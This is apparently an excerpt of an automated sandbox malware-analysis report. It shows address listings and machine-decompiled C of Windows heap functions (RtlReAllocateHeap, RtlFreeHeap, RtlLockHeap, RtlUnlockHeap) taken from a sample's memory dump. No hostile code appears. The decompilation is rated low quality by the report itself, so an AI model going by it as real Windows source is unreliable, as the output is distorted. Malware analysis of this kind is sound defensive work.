                                                                                                                              0x1d7effab
                                                                                                                              0x1d7effb0
                                                                                                                              0x1d7effb5
                                                                                                                              0x1d7effb5
                                                                                                                              0x1d7effa9
                                                                                                                              0x1d7effb8
                                                                                                                              0x1d7effbc
                                                                                                                              0x1d7effce
                                                                                                                              0x1d7effd1
                                                                                                                              0x1d7effd4
                                                                                                                              0x1d7effbe
                                                                                                                              0x1d7effc0
                                                                                                                              0x1d7effc5
                                                                                                                              0x1d7effc8
                                                                                                                              0x1d7effc8
                                                                                                                              0x1d7effd7
                                                                                                                              0x1d7effd9
                                                                                                                              0x1d7effdd
                                                                                                                              0x1d7effe0
                                                                                                                              0x1d7effea
                                                                                                                              0x1d7efff0
                                                                                                                              0x1d7efff0
                                                                                                                              0x1d7efff0
                                                                                                                              0x1d7efff2
                                                                                                                              0x1d7efff5
                                                                                                                              0x1d7f0065
                                                                                                                              0x1d7f0065
                                                                                                                              0x1d7efff7
                                                                                                                              0x1d7efff7
                                                                                                                              0x1d7efffe
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7f0004
                                                                                                                              0x1d7f000b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7f000d
                                                                                                                              0x1d7f0013
                                                                                                                              0x1d7f0016
                                                                                                                              0x1d7f0035
                                                                                                                              0x1d7f003a
                                                                                                                              0x1d7f0018
                                                                                                                              0x1d7f002d
                                                                                                                              0x1d7f0032
                                                                                                                              0x1d7f0040
                                                                                                                              0x1d7f004b
                                                                                                                              0x1d7f004c
                                                                                                                              0x1d7f004f
                                                                                                                              0x1d7f0058
                                                                                                                              0x1d7f005d
                                                                                                                              0x1d7eff47
                                                                                                                              0x1d7eff47
                                                                                                                              0x1d7eff4d
                                                                                                                              0x1d7eff51
                                                                                                                              0x1d7eff57
                                                                                                                              0x1d7eff5e
                                                                                                                              0x1d7eff64
                                                                                                                              0x1d7eff65
                                                                                                                              0x1d7eff65
                                                                                                                              0x1d7eff51
                                                                                                                              0x00000000
                                                                                                                              0x1d7efff5
                                                                                                                              0x1d7eff04
                                                                                                                              0x1d7eff07
                                                                                                                              0x1d7eff26
                                                                                                                              0x1d7eff2b
                                                                                                                              0x1d7eff09
                                                                                                                              0x1d7eff1e
                                                                                                                              0x1d7eff23
                                                                                                                              0x1d7eff31
                                                                                                                              0x1d7eff3f
                                                                                                                              0x1d7eff44
                                                                                                                              0x00000000
                                                                                                                              0x1d7eff44
                                                                                                                              0x1d7efe18
                                                                                                                              0x1d7efe20
                                                                                                                              0x1d7efe28
                                                                                                                              0x1d7efe2e
                                                                                                                              0x1d7f02d1
                                                                                                                              0x1d7f02d4
                                                                                                                              0x1d7f02e0
                                                                                                                              0x1d7f02e0

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                              • API String ID: 3446177414-1700792311
                                                                                                                              • Opcode ID: 6c8c0f67512be7744eb760e5abd0395e0e5088b8abd55783b8bff0e397270bf4
                                                                                                                              • Instruction ID: 15e654a8478c15b5c2fcf9b7441a351355315e2eb37985b9ca69578a77f45b85
                                                                                                                              • Opcode Fuzzy Hash: 6c8c0f67512be7744eb760e5abd0395e0e5088b8abd55783b8bff0e397270bf4
                                                                                                                              • Instruction Fuzzy Hash: D4D1EF3A904695EFCB22CFA8C444BADFBF1FF49720F05844AE4559B762C735A941CB12
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7EF8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 67%
                                                                                                                              			E1D7EF8F8(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t73;
				signed int _t75;
				signed int _t79;
				intOrPtr _t81;
				signed int _t82;
				signed char _t86;
				signed int _t87;
				intOrPtr _t89;
				intOrPtr _t93;
				intOrPtr _t103;
				signed int _t120;
				signed char _t131;
				intOrPtr _t133;
				signed int _t136;
				signed int _t151;
				signed int* _t154;
				signed int _t158;
				signed int* _t160;
				intOrPtr* _t164;
				void* _t165;

				_push(0x34);
				_push(0x1d81d2f8);
				E1D797BE4(__ebx, __edi, __esi);
				 *(_t165 - 0x34) = __edx;
				_t162 = __ecx;
				 *((intOrPtr*)(_t165 - 0x30)) = __ecx;
				_t158 = 0;
				 *(_t165 - 0x28) = 0;
				 *((char*)(_t165 - 0x19)) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t165 - 4)) = 0;
					 *((intOrPtr*)(_t165 - 4)) = 1;
					_t73 = E1D737662("RtlFreeHeap");
					__eflags = _t73;
					if(_t73 == 0) {
						_t158 = 0;
						 *(_t165 - 0x28) = 0;
						L34:
						 *((intOrPtr*)(_t165 - 4)) = 0;
						 *((intOrPtr*)(_t165 - 4)) = 0xfffffffe;
						E1D7EFBB7();
						_t75 = _t158;
						goto L35;
					}
					_t131 =  *(__ecx + 0x44) |  *(_t165 - 0x34);
					 *(_t165 - 0x2c) = _t131;
					 *(_t165 - 0x34) = _t131 | 0x10000000;
					__eflags = _t131 & 0x00000001;
					if((_t131 & 0x00000001) == 0) {
						E1D74FED0( *((intOrPtr*)(__ecx + 0xc8)));
						 *((char*)(_t165 - 0x19)) = 1;
						_t120 =  *(_t165 - 0x2c) | 0x10000001;
						__eflags = _t120;
						 *(_t165 - 0x34) = _t120;
					}
					E1D7F0835(_t162, 0);
					_t151 =  *((intOrPtr*)(_t165 + 8)) + 0xfffffff8;
					__eflags =  *((char*)(_t151 + 7)) - 5;
					if( *((char*)(_t151 + 7)) == 5) {
						_t151 = _t151 - (( *(_t151 + 6) & 0x000000ff) << 3);
						__eflags = _t151;
					}
					 *(_t165 - 0x24) = _t151;
					 *(_t165 - 0x2c) = _t151;
					_t133 = _t162;
					_t79 = E1D73753F(_t133, _t151, "RtlFreeHeap");
					__eflags = _t79;
					if(_t79 == 0) {
						goto L34;
					} else {
						__eflags =  *((intOrPtr*)(_t165 + 8)) -  *0x1d8347d0; // 0x0
						_t81 =  *[fs:0x30];
						if(__eflags != 0) {
							_t82 =  *(_t81 + 0x68);
							 *(_t165 - 0x3c) = _t82;
							__eflags = _t82 & 0x00000800;
							if((_t82 & 0x00000800) == 0) {
								L32:
								_t158 = E1D753BC0(_t162,  *(_t165 - 0x34),  *((intOrPtr*)(_t165 + 8)));
								 *(_t165 - 0x28) = _t158;
								E1D7F0D24( *((intOrPtr*)(_t165 - 0x30)));
								E1D7F0835( *((intOrPtr*)(_t165 - 0x30)), 0);
								goto L34;
							}
							__eflags =  *0x1d8347d4;
							if( *0x1d8347d4 == 0) {
								goto L32;
							}
							_t160 =  *(_t165 - 0x2c);
							_t154 =  *(_t165 - 0x24);
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								_t38 =  &(_t154[0]); // 0xffff
								_t39 =  &(_t154[0]); // 0xffffff
								__eflags = _t160[0] - ( *_t38 ^  *_t39 ^  *_t154);
								if(__eflags != 0) {
									_push(_t133);
									E1D7FD646(0, _t162, _t160, _t160, _t162, __eflags);
									_t154 =  *(_t165 - 0x24);
								}
							}
							__eflags = _t160[0] & 0x00000002;
							if((_t160[0] & 0x00000002) == 0) {
								_t86 = _t160[0];
								 *(_t165 - 0x1a) = _t86;
								_t87 = _t86 & 0x000000ff;
							} else {
								_t103 = E1D773AE9(_t160);
								 *((intOrPtr*)(_t165 - 0x40)) = _t103;
								_t87 =  *(_t103 + 2) & 0x0000ffff;
							}
							_t136 = _t87;
							 *(_t165 - 0x20) = _t87;
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								_t51 =  &(_t154[0]); // 0xffff
								_t52 =  &(_t154[0]); // 0xffffff
								_t160[0] =  *_t51 ^  *_t52 ^  *_t154;
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								__eflags =  *_t160;
							}
							__eflags = _t136;
							if(_t136 != 0) {
								__eflags = _t136 -  *0x1d8347d4; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								__eflags =  *((intOrPtr*)(_t162 + 0x7c)) -  *0x1d8347d6; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0xc);
								if( *(_t89 + 0xc) == 0) {
									_push("HEAP: ");
									E1D73B910();
								} else {
									E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E1D7E823A(_t162,  *(_t165 - 0x20)));
								E1D73B910("About to free block at %p with tag %ws\n",  *((intOrPtr*)(_t165 + 8)));
								L30:
								_t93 =  *[fs:0x30];
								__eflags =  *((char*)(_t93 + 2));
								if( *((char*)(_t93 + 2)) != 0) {
									 *0x1d8347a1 = 1;
									 *0x1d834100 = 0;
									asm("int3");
									 *0x1d8347a1 = 0;
								}
							}
							goto L32;
						}
						__eflags =  *(_t81 + 0xc);
						if( *(_t81 + 0xc) == 0) {
							_push("HEAP: ");
							E1D73B910();
						} else {
							E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						E1D73B910("About to free block at %p\n",  *0x1d8347d0);
						goto L30;
					}
				} else {
					_t164 =  *0x1d833750; // 0x0
					 *0x1d8391e0(__ecx, __edx,  *((intOrPtr*)(_t165 + 8)));
					_t75 =  *_t164() & 0x000000ff;
					L35:
					 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0x10));
					return _t75;
				}
			}























                                                                                                                              0x1d7ef8f8
                                                                                                                              0x1d7ef8fa
                                                                                                                              0x1d7ef8ff
                                                                                                                              0x1d7ef906
                                                                                                                              0x1d7ef909
                                                                                                                              0x1d7ef90b
                                                                                                                              0x1d7ef910
                                                                                                                              0x1d7ef912
                                                                                                                              0x1d7ef915
                                                                                                                              0x1d7ef91f
                                                                                                                              0x1d7ef93e
                                                                                                                              0x1d7ef941
                                                                                                                              0x1d7ef94f
                                                                                                                              0x1d7ef954
                                                                                                                              0x1d7ef956
                                                                                                                              0x1d7efb8c
                                                                                                                              0x1d7efb8e
                                                                                                                              0x1d7efb91
                                                                                                                              0x1d7efb91
                                                                                                                              0x1d7efb94
                                                                                                                              0x1d7efb9b
                                                                                                                              0x1d7efba0
                                                                                                                              0x00000000
                                                                                                                              0x1d7efba0
                                                                                                                              0x1d7ef95f
                                                                                                                              0x1d7ef962
                                                                                                                              0x1d7ef96c
                                                                                                                              0x1d7ef96f
                                                                                                                              0x1d7ef972
                                                                                                                              0x1d7ef97a
                                                                                                                              0x1d7ef97f
                                                                                                                              0x1d7ef986
                                                                                                                              0x1d7ef986
                                                                                                                              0x1d7ef98b
                                                                                                                              0x1d7ef98b
                                                                                                                              0x1d7ef992
                                                                                                                              0x1d7ef99a
                                                                                                                              0x1d7ef99d
                                                                                                                              0x1d7ef9a1
                                                                                                                              0x1d7ef9aa
                                                                                                                              0x1d7ef9aa
                                                                                                                              0x1d7ef9aa
                                                                                                                              0x1d7ef9ac
                                                                                                                              0x1d7ef9af
                                                                                                                              0x1d7ef9b7
                                                                                                                              0x1d7ef9b9
                                                                                                                              0x1d7ef9be
                                                                                                                              0x1d7ef9c0
                                                                                                                              0x00000000
                                                                                                                              0x1d7ef9c6
                                                                                                                              0x1d7ef9c9
                                                                                                                              0x1d7ef9cf
                                                                                                                              0x1d7ef9d5
                                                                                                                              0x1d7efa1b
                                                                                                                              0x1d7efa1e
                                                                                                                              0x1d7efa21
                                                                                                                              0x1d7efa26
                                                                                                                              0x1d7efb2b
                                                                                                                              0x1d7efb37
                                                                                                                              0x1d7efb39
                                                                                                                              0x1d7efb41
                                                                                                                              0x1d7efb4b
                                                                                                                              0x00000000
                                                                                                                              0x1d7efb4b
                                                                                                                              0x1d7efa2c
                                                                                                                              0x1d7efa33
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7efa39
                                                                                                                              0x1d7efa3c
                                                                                                                              0x1d7efa3f
                                                                                                                              0x1d7efa42
                                                                                                                              0x1d7efa47
                                                                                                                              0x1d7efa49
                                                                                                                              0x1d7efa4c
                                                                                                                              0x1d7efa51
                                                                                                                              0x1d7efa54
                                                                                                                              0x1d7efa56
                                                                                                                              0x1d7efa5b
                                                                                                                              0x1d7efa60
                                                                                                                              0x1d7efa60
                                                                                                                              0x1d7efa54
                                                                                                                              0x1d7efa63
                                                                                                                              0x1d7efa67
                                                                                                                              0x1d7efa79
                                                                                                                              0x1d7efa7c
                                                                                                                              0x1d7efa7f
                                                                                                                              0x1d7efa69
                                                                                                                              0x1d7efa6b
                                                                                                                              0x1d7efa70
                                                                                                                              0x1d7efa73
                                                                                                                              0x1d7efa73
                                                                                                                              0x1d7efa82
                                                                                                                              0x1d7efa84
                                                                                                                              0x1d7efa88
                                                                                                                              0x1d7efa8b
                                                                                                                              0x1d7efa8d
                                                                                                                              0x1d7efa90
                                                                                                                              0x1d7efa95
                                                                                                                              0x1d7efa9b
                                                                                                                              0x1d7efa9b
                                                                                                                              0x1d7efa9b
                                                                                                                              0x1d7efa9d
                                                                                                                              0x1d7efaa0
                                                                                                                              0x1d7efaa6
                                                                                                                              0x1d7efaad
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7efab3
                                                                                                                              0x1d7efaba
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7efabc
                                                                                                                              0x1d7efac2
                                                                                                                              0x1d7efac5
                                                                                                                              0x1d7efae4
                                                                                                                              0x1d7efae9
                                                                                                                              0x1d7efac7
                                                                                                                              0x1d7efadc
                                                                                                                              0x1d7efae1
                                                                                                                              0x1d7efafa
                                                                                                                              0x1d7efb03
                                                                                                                              0x1d7efb0b
                                                                                                                              0x1d7efb0b
                                                                                                                              0x1d7efb11
                                                                                                                              0x1d7efb15
                                                                                                                              0x1d7efb17
                                                                                                                              0x1d7efb1e
                                                                                                                              0x1d7efb24
                                                                                                                              0x1d7efb25
                                                                                                                              0x1d7efb25
                                                                                                                              0x1d7efb15
                                                                                                                              0x00000000
                                                                                                                              0x1d7efaa0
                                                                                                                              0x1d7ef9d7
                                                                                                                              0x1d7ef9da
                                                                                                                              0x1d7ef9f9
                                                                                                                              0x1d7ef9fe
                                                                                                                              0x1d7ef9dc
                                                                                                                              0x1d7ef9f1
                                                                                                                              0x1d7ef9f6
                                                                                                                              0x1d7efa0f
                                                                                                                              0x00000000
                                                                                                                              0x1d7efa15
                                                                                                                              0x1d7ef921
                                                                                                                              0x1d7ef926
                                                                                                                              0x1d7ef92e
                                                                                                                              0x1d7ef936
                                                                                                                              0x1d7efba2
                                                                                                                              0x1d7efba5
                                                                                                                              0x1d7efbb1
                                                                                                                              0x1d7efbb1

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                              • API String ID: 3446177414-3492000579
                                                                                                                              • Opcode ID: 0d2d9e77b371fec6d9e41cdbea1670e52f6a4114b9268c2095c2daef93945e8c
                                                                                                                              • Instruction ID: 2cff97207b0c53a985f9427a045b8dd7e2a0080eccc18f680938eadd3f1564e1
                                                                                                                              • Opcode Fuzzy Hash: 0d2d9e77b371fec6d9e41cdbea1670e52f6a4114b9268c2095c2daef93945e8c
                                                                                                                              • Instruction Fuzzy Hash: 4471F27A904685EFCB02CF68D4946ADFBF2FF89360F05805AE5459B762C735A940CB42
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D76DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 19%
                                                                                                                              			E1D76DA20(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t44;
				char* _t45;
				void* _t65;
				intOrPtr _t72;
				signed int _t73;
				intOrPtr _t74;
				void* _t82;
				signed char* _t87;
				signed char _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr* _t94;
				signed int* _t95;

				_t93 = _a4;
				if( *((intOrPtr*)(_t93 + 8)) == 0xddeeddee) {
					E1D809335(_t93, 0, __ecx);
					L6:
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t44 != 0) {
						if( *_t44 == 0) {
							goto L7;
						}
						_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L8:
						if( *_t45 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E1D7FF717(_t93);
							}
						}
						return 1;
					}
					L7:
					_t45 = 0x7ffe0380;
					goto L8;
				}
				if(( *(_t93 + 0x44) & 0x01000000) != 0) {
					_t94 =  *0x1d83376c; // 0x0
					 *0x1d8391e0(_t93);
					return  *_t94();
				}
				if( *((intOrPtr*)(_t93 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1D73B910();
					} else {
						E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1D73B910("Invalid heap signature for heap at %p", _t93);
					E1D73B910(", passed to %s", "RtlUnlockHeap");
					_push("\n");
					E1D73B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1d8347a1 = 1;
						asm("int3");
						 *0x1d8347a1 = 0;
					}
					return 0;
				}
				if(( *(_t93 + 0x40) & 0x00000001) != 0) {
					goto L6;
				}
				_t92 =  *((intOrPtr*)(_t93 + 0xc8));
				 *((intOrPtr*)(_t93 + 0xe8)) =  *((intOrPtr*)(_t93 + 0xe8)) + 0xffff;
				_t13 = _t92 + 8;
				 *_t13 =  *((intOrPtr*)(_t92 + 8)) - 1;
				if( *_t13 != 0) {
					goto L6;
				}
				 *(_t92 + 0xc) =  *(_t92 + 0xc) & 0x00000000;
				_t87 = _t92 + 4;
				_t65 = 0xfffffffe;
				asm("lock cmpxchg [edx], ecx");
				_v12 = 0xffff;
				if(_t65 != 0xfffffffe) {
					if(( *_t87 & 0x00000001) != 0) {
						E1D7DAA40(_t92);
					}
					_t72 =  *((intOrPtr*)(_t92 + 0x10));
					_v8 = _t72;
					if(_t72 == 0) {
						_v8 = E1D76FEC0(_t92);
					}
					_v16 = _v16 & 0x00000000;
					_t95 = _t92 + 4;
					_t73 = _v12;
					while(1) {
						_t90 = _t73 & 0x00000002 | 0x00000001;
						_t82 = _t90 + _t73;
						asm("lock cmpxchg [esi], ecx");
						if(_t73 == _t73) {
							break;
						}
						E1D76BAC0(_t82,  &_v16);
						_t73 =  *_t95;
					}
					_t93 = _a4;
					_t74 = _v8;
					if((_t90 & 0x00000002) != 0) {
						E1D76F300(_t92, _t74);
					}
				}
				goto L6;
			}



















                                                                                                                              0x1d76da2a
                                                                                                                              0x1d76da35
                                                                                                                              0x1d7af408
                                                                                                                              0x1d76da90
                                                                                                                              0x1d76da96
                                                                                                                              0x1d76da9b
                                                                                                                              0x1d7af510
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7af51f
                                                                                                                              0x1d76daa6
                                                                                                                              0x1d76daa9
                                                                                                                              0x1d7af537
                                                                                                                              0x1d7af53f
                                                                                                                              0x1d7af53f
                                                                                                                              0x1d7af537
                                                                                                                              0x00000000
                                                                                                                              0x1d76daaf
                                                                                                                              0x1d76daa1
                                                                                                                              0x1d76daa1
                                                                                                                              0x00000000
                                                                                                                              0x1d76daa1
                                                                                                                              0x1d76da42
                                                                                                                              0x1d7af413
                                                                                                                              0x1d7af41b
                                                                                                                              0x00000000
                                                                                                                              0x1d7af421
                                                                                                                              0x1d76da4f
                                                                                                                              0x1d7af432
                                                                                                                              0x1d7af451
                                                                                                                              0x1d7af456
                                                                                                                              0x1d7af434
                                                                                                                              0x1d7af449
                                                                                                                              0x1d7af44e
                                                                                                                              0x1d7af462
                                                                                                                              0x1d7af471
                                                                                                                              0x1d7af476
                                                                                                                              0x1d7af47b
                                                                                                                              0x1d7af48d
                                                                                                                              0x1d7af48f
                                                                                                                              0x1d7af496
                                                                                                                              0x1d7af497
                                                                                                                              0x1d7af497
                                                                                                                              0x00000000
                                                                                                                              0x1d7af49e
                                                                                                                              0x1d76da59
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76da5b
                                                                                                                              0x1d76da66
                                                                                                                              0x1d76da6d
                                                                                                                              0x1d76da6d
                                                                                                                              0x1d76da71
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76da73
                                                                                                                              0x1d76da77
                                                                                                                              0x1d76da7f
                                                                                                                              0x1d76da80
                                                                                                                              0x1d76da84
                                                                                                                              0x1d76da8a
                                                                                                                              0x1d7af4a8
                                                                                                                              0x1d7af4ab
                                                                                                                              0x1d7af4ab
                                                                                                                              0x1d7af4b0
                                                                                                                              0x1d7af4b3
                                                                                                                              0x1d7af4b8
                                                                                                                              0x1d7af4c1
                                                                                                                              0x1d7af4c1
                                                                                                                              0x1d7af4c4
                                                                                                                              0x1d7af4c8
                                                                                                                              0x1d7af4cb
                                                                                                                              0x1d7af4ce
                                                                                                                              0x1d7af4d5
                                                                                                                              0x1d7af4d8
                                                                                                                              0x1d7af4db
                                                                                                                              0x1d7af4e1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7af4e7
                                                                                                                              0x1d7af4ec
                                                                                                                              0x1d7af4ec
                                                                                                                              0x1d7af4f0
                                                                                                                              0x1d7af4f3
                                                                                                                              0x1d7af4f9
                                                                                                                              0x1d7af503
                                                                                                                              0x1d7af503
                                                                                                                              0x1d7af4f9
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                              • API String ID: 3446177414-3224558752
                                                                                                                              • Opcode ID: 5df20378c0e802116c56b7fad9a9f9f8c9a39b3677548893542477cf16d02f01
                                                                                                                              • Instruction ID: 3c87beddfb4f9d64a7bd9b0f28beb81b82f416186d3516d2ef6f71134c3bd97f
                                                                                                                              • Opcode Fuzzy Hash: 5df20378c0e802116c56b7fad9a9f9f8c9a39b3677548893542477cf16d02f01
                                                                                                                              • Instruction Fuzzy Hash: B7412936518642DFD712CF28C844769F7A4FF44730F09866AF9054B692D738AD80C7A3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D76DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 30%
                                                                                                                              			E1D76DAC0(void* __ecx, intOrPtr _a4) {
				char _v5;
				intOrPtr* _t25;
				char* _t26;
				char _t28;
				intOrPtr _t53;
				intOrPtr* _t55;

				_t53 = _a4;
				_v5 = 0xff;
				if( *((intOrPtr*)(_t53 + 8)) == 0xddeeddee) {
					E1D809109(_t53,  &_v5);
					L5:
					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t25 != 0) {
						if( *_t25 == 0) {
							goto L6;
						}
						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L7:
						if( *_t26 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E1D7FF2AE(_t53);
							}
						}
						_t28 = 1;
						L9:
						return _t28;
					}
					L6:
					_t26 = 0x7ffe0380;
					goto L7;
				}
				if(( *(_t53 + 0x44) & 0x01000000) != 0) {
					_t55 =  *0x1d833768; // 0x0
					 *0x1d8391e0(_t53);
					_t28 =  *_t55();
					goto L9;
				}
				if( *((intOrPtr*)(_t53 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1D73B910();
					} else {
						E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1D73B910("Invalid heap signature for heap at %p", _t53);
					E1D73B910(", passed to %s", "RtlLockHeap");
					_push("\n");
					E1D73B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1d8347a1 = 1;
						asm("int3");
						 *0x1d8347a1 = 0;
					}
					_t28 = 0;
					goto L9;
				} else {
					if(( *(_t53 + 0x40) & 0x00000001) == 0) {
						E1D74FED0( *((intOrPtr*)(_t53 + 0xc8)));
						 *((short*)(_t53 + 0xe8)) =  *((short*)(_t53 + 0xe8)) + 1;
					}
					goto L5;
				}
			}









                                                                                                                              0x1d76dac8
                                                                                                                              0x1d76dacb
                                                                                                                              0x1d76dad6
                                                                                                                              0x1d7af54e
                                                                                                                              0x1d76db0e
                                                                                                                              0x1d76db14
                                                                                                                              0x1d76db19
                                                                                                                              0x1d7af5ee
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7af5fd
                                                                                                                              0x1d76db24
                                                                                                                              0x1d76db27
                                                                                                                              0x1d7af614
                                                                                                                              0x1d7af61c
                                                                                                                              0x1d7af61c
                                                                                                                              0x1d7af614
                                                                                                                              0x1d76db2d
                                                                                                                              0x1d76db2f
                                                                                                                              0x1d76db31
                                                                                                                              0x1d76db31
                                                                                                                              0x1d76db1f
                                                                                                                              0x1d76db1f
                                                                                                                              0x00000000
                                                                                                                              0x1d76db1f
                                                                                                                              0x1d76dae3
                                                                                                                              0x1d7af559
                                                                                                                              0x1d7af561
                                                                                                                              0x1d7af567
                                                                                                                              0x00000000
                                                                                                                              0x1d7af567
                                                                                                                              0x1d76daf0
                                                                                                                              0x1d7af578
                                                                                                                              0x1d7af597
                                                                                                                              0x1d7af59c
                                                                                                                              0x1d7af57a
                                                                                                                              0x1d7af58f
                                                                                                                              0x1d7af594
                                                                                                                              0x1d7af5a8
                                                                                                                              0x1d7af5b7
                                                                                                                              0x1d7af5bc
                                                                                                                              0x1d7af5c1
                                                                                                                              0x1d7af5d3
                                                                                                                              0x1d7af5d5
                                                                                                                              0x1d7af5dc
                                                                                                                              0x1d7af5dd
                                                                                                                              0x1d7af5dd
                                                                                                                              0x1d7af5e4
                                                                                                                              0x00000000
                                                                                                                              0x1d76daf6
                                                                                                                              0x1d76dafa
                                                                                                                              0x1d76db02
                                                                                                                              0x1d76db07
                                                                                                                              0x1d76db07
                                                                                                                              0x00000000
                                                                                                                              0x1d76dafa

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
